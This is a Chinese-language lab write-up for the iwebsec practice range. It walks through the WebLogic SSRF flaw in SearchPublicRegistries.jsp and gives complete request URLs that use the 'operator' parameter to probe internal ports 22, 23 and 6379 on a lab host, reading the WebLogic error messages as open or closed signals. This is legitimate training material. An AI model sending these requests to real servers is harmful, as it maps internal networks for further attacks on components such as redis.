目录
第01关 中间件漏洞
通过实战iwebsec靶场的Weblogic SSRF中间件漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
1.打开靶场
http://iwebsec.com:81/middleware/01.phphttp://iwebsec.com:81/middleware/01.php
2.Weblogic SSRF漏洞
(1)漏洞描述
weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
(2)影响版本
weblogic 10.0.2 – 10.3.6版本
(3)原理分析
通常来将,WebLogic服务开启的端口号是7001。
WebLogic的SSRF漏洞位于:7001/uddiexplorer/SearchPublicRegistries.jsp页面,如下所示
这个漏洞可以通过operater这个可控参数来探测端口号是否开放
接下来进行测试,在页面中name中输入ljn,其他内容为空,点击search然后使用bp抓包
此时post的参数如下所示
operator=http%3A%2F%2Fwww-3.ibm.com%2Fservices%2Fuddi%2Finquiryapi&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
接下来将operater访问的url改为想要探测的端口号,
http%3A%2F%2Fwww-3.ibm.com%2Fservices%2Fuddi%2Finquiryapi
比如说想探测22端口,那么就替换为http://127.0.0.1:22
operator=http://127.0.0.1:22&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
如果想探测redis服务的6379端口,那么就替换为http://127.0.0.1:6379
operator=http://127.0.0.1:6379&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
SSRF漏洞的渗透结果正如本关卡提示,如下所示
对于iwebsec服务而言,ip地址为192.168.71.152,服务端口号为7001,那么
访问 http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search 返回which did not have a valid SOAP content-type: unknown/unknown.说明127.0.0.1主机的22端口开放
访问 :http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:23&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search 返回Connection refused.说明127.0.0.1主机的23端口未开放
3.渗透实战
(1)验证22端口
http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
如下所示,提示An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://127.0.0.1:22 which did not have a valid SOAP content-type: null.说明端口22已经开启
(2)验证23端口
http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:23&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
如下所示,提示 An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '23' 说明端口23未开启
(3)验证6379端口
http://192.168.71.152:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:6379&rdoSearch=name&txtSearchname=ljn&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
如下所示,提示 An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Response contained no data 说明端口6379已开启